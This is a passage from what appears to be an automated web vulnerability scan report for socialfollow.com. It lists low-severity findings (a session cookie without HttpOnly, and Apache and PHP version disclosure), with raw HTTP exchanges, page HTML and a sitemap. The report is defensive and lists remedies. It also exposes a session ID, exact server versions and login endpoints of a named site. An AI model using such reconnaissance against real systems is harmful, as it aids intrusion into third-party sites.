title="Vote-for-us">Vote-for-us</a></li><li><a href="/blog/tag/wordpress/" title="Wordpress">Wordpress</a></li><li><a href="/blog/tag/ziipa/" title="Ziipa">Ziipa</a></li></ul></li><li>Tweets</li><li style="list-style-type: none;"><ul><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-06-28/" title="Twitter-weekly-updates-for-2009-06-28">Twitter-weekly-updates-for-2009-06-28</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-05-6/" title="Twitter-weekly-updates-for-2009-07-05-6">Twitter-weekly-updates-for-2009-07-05-6</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12-2/" title="Twitter-weekly-updates-for-2009-07-12-2">Twitter-weekly-updates-for-2009-07-12-2</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12-3/" title="Twitter-weekly-updates-for-2009-07-12-3">Twitter-weekly-updates-for-2009-07-12-3</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12-4/" title="Twitter-weekly-updates-for-2009-07-12-4">Twitter-weekly-updates-for-2009-07-12-4</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12/" title="Twitter-weekly-updates-for-2009-07-12">Twitter-weekly-updates-for-2009-07-12</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-19-2/" title="Twitter-weekly-updates-for-2009-07-19-2">Twitter-weekly-updates-for-2009-07-19-2</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-19-3/" title="Twitter-weekly-updates-for-2009-07-19-3">Twitter-weekly-updates-for-2009-07-19-3</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-19/" title="Twitter-weekly-updates-for-2009-07-19">Twitter-weekly-updates-for-2009-07-19</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-26-2/" title="Twitter-weekly-updates-for-2009-07-26-2">Twitter-weekly-updates-for-2009-07-26-2</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-26/" title="Twitter-weekly-updates-for-2009-07-26"..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /

/ CONFIRMED

http://www.socialfollow.com/

Identified Cookie

PHPSESSID

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b; expires=Wed, 20 Apr 2011 03:16:30 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7330
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Social Follow | Create a Follow Me Button | All social networks in one button</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><link type="text/css" rel="stylesheet" href="/css/home.css" /><script type="text/javascript" src="/js/flash-detect.js"></script><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button selected">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page" style="padding-top:0"> <br /><div id="flashcontent" style="width:904; height:250px;"> <h2>Oops!</h2> <p>It looks like you don't have flash player installed. You might want to get that if you plan to use the Flash gallery. <a href="http://www.macromedia.com/go/getflashplayer" >Click here</a> to go to Macromedia download page.</p></div><script type="text/javascript"> var so = new SWFObject("/flash/home.swf", "gallery", "904", "250", "0", "#A5C62F"); so.write("flashcontent");</script><div class="left" style="width:850px"> <div style="float:left; width:330px;text-align:center;"> <h1 style="font-size:26px;"><span class="orange">Try</span> Our Sample Button</h1> <p align="center" style="padding: 0; margin:0;font-size:14px; color:#A9B104;">(mouse over button)</p> <div align="center" style="margin-top: 10px;"> <!-- Start SocialFollow.com Button Code --> <img src="http://www.socialfollow.com/button/image/?b=1" class="socialFollowImage" alt="Follow Me!" /> <script type="text/javascript" src="http://www.socialfollow.com/button/?b=1"></script> <script type="text/javascript">socialfollow.init("socialFollowImage");</script> <!-- End SocialFollow.com Button Code --> </div> </div> <div style="float:right; width:400px; text-align:left;"> <h1 style="font-size:29px;">Sign Up <span class="orange">Now!</span> <span style="font-size:23px;">(It's Free)</span></h1> <form method="post" name="fRegister" action="/register.php"> <table> <tr> <td valign="top" width="135"><label for="tName">Your Name:</label></td> <td><input name="tName" type="text" id="tName" value="" class="textBoxSize" maxlength="75" /></td> </tr> <tr> <td valign="top"><label for="tEmail">Email:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="" class="textBoxSize" maxlength="100" /></td> </tr> <tr> <td valign="top"><label for="tPassword">Password:</label></td> <td><input name="tPassword" id="tPassword" type="password" value="" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td valign="top"><label for="tRePassword">Password (retype):</label></td> <td><input name="tRePassword" type="password" id="tRePassword" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbNewsletter" id="cbNewsletter" class="cb" value="1" checked="checked" /> <label for="cbNewsletter">Subscribe to Social Follow's Newsletter</label></td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbTerms" id="cbTerms" class="cb" value="agree" style="margin-bottom: 10px; float: left; margin-right: 4px;" /> <label for="cbTerms">Yes, I agree to the <a href="/terms-and-conditions.php" target="_blank" title="Terms and Conditions" class="none">terms and conditions</a> and <a href="/privacy-policy.php" title="Privacy Policy" target="_blank" class="none">privacy policy</a>.</label></td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td valign="top">&nbsp;</td> <td align="right"><input name="submit" type="image" src="/images/btn_sign-up.gif" alt="Sign-up!" /></td> </tr> </table> </form> <script type="text/javascript" language="javascript">var fv=new Validator("fRegister");fv.addValidation("tName","req", "The \"Your Name\" field is required");fv.addValidation("tEmail","req", "The \"Email\" field is required");fv.addValidation("tEmail","email", "The \"Email\" field must contain a valid email address");fv.addValidation("tPassword","req", "The \"Password\" field is required");fv.addValidation("tPassword","minlen=4", "The \"Password\" field must have at least 4 characters");fv.addValidation("tPassword|tRePassword","match", "The Password fields must match");fv.addValidation("cbTerms","req", "You must agree to the terms of service and privacy policy");</script> </div></div><div class="right"> </div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /sitemap.xml

/sitemap.xml

http://www.socialfollow.com/sitemap.xml

Extracted Version

2.2.8 (Ubuntu)

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Fri, 18 Jun 2010 23:42:18 GMT
ETag: "19abdf-e460-4895681664a80"
Accept-Ranges: bytes
Content-Length: 58464
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: application/xml


<?xml version="1.0" encoding="UTF-8"?>
<urlset
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
<!-- created with Free Online Sitemap Generator www.xml-sitemaps.com -->

<url>
<loc>http://www.socialfollow.com/</loc>
<changefreq>monthly</changefreq>
<priority>1.00</priority>
</url>
<url>
<loc>http://www.socialfollow.com/forgot-password.php</loc>
<changefreq>monthly</changefreq>
<priority>0.50</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/terms-and-conditions.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/privacy-policy.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/contact-us.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/sitemap.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/movingpartsaudio/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/frozenrodeo/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/theannandalecardinals/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/heartofthelakesrecords/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-special-touch/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-vintage-revolution/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/aarontimlin/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhi/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhishek/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/academy-of-life-and-leadership/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/achraf52/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/acquaspa/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adam-haider/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adamlinsley/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/login.php</loc>
<changefreq>monthly</changefreq>
<priority>0.85</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/wordpress-plugin-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/kerry-jones/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-feature/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/plugin/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/wordpress/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/server-upgrade-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-release/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-19/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-4/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-3/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-12-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/page/2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/08/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/07/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/06/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/04/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/2009/03/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/future-features/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/analytics/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/blogger-institute/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/fine-art-of-blogging/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/follow-me-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/go2web20net/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/interview/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/killerstartupscom/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/multiple-languages/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/rafferty-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/raffy-pendery/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/reputation-management/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-button/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-featured/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-following/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networking-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-networks/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/studio98/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/twitter-feed/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/visionwiz/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/vote-for-us/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/ziipa/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-almost-launched/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/social-follow-button-user-flow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/definition-of-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/social-following/social-follow-joins-twitter/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/banner/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barandide/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barneykavai/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/barry-shereshevsky/</loc>
<changefreq>monthly</changefreq>
<pr..
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /sitemap.xml

/sitemap.xml

http://www.socialfollow.com/sitemap.xml

Extracted Version

PHP/5.2.4

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Fri, 18 Jun 2010 23:42:18 GMT
ETag: "19abdf-e460-4895681664a80"
Accept-Ranges: bytes
Content-Length: 58464
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: application/xml


<?xml version="1.0" encoding="UTF-8"?>
<urlset
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
<!-- created with Free Online Sitemap Generator www.xml-sitemaps.com -->

<url>
<loc>http://www.socialfollow.com/</loc>
<changefreq>monthly</changefreq>
<priority>1.00</priority>
</url>
<url>
<loc>http://www.socialfollow.com/forgot-password.php</loc>
<changefreq>monthly</changefreq>
<priority>0.50</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/terms-and-conditions.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/privacy-policy.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/contact-us.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/sitemap.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/movingpartsaudio/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/frozenrodeo/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/theannandalecardinals/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/heartofthelakesrecords/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-special-touch/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-vintage-revolution/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/aarontimlin/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhi/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhishek/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/academy-of-life-and-leadership/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/achraf52/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/acquaspa/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adam-haider/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adamlinsley/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/login.php</loc>
<changefreq>monthly</changefreq>
<priority>0.85</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/wordpress-plugin-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/kerry-jones/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-feature/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/plugin/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/wordpress/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/server-upgrade-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-release/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26-2/</loc>
<changefreq>monthly</changefreq>
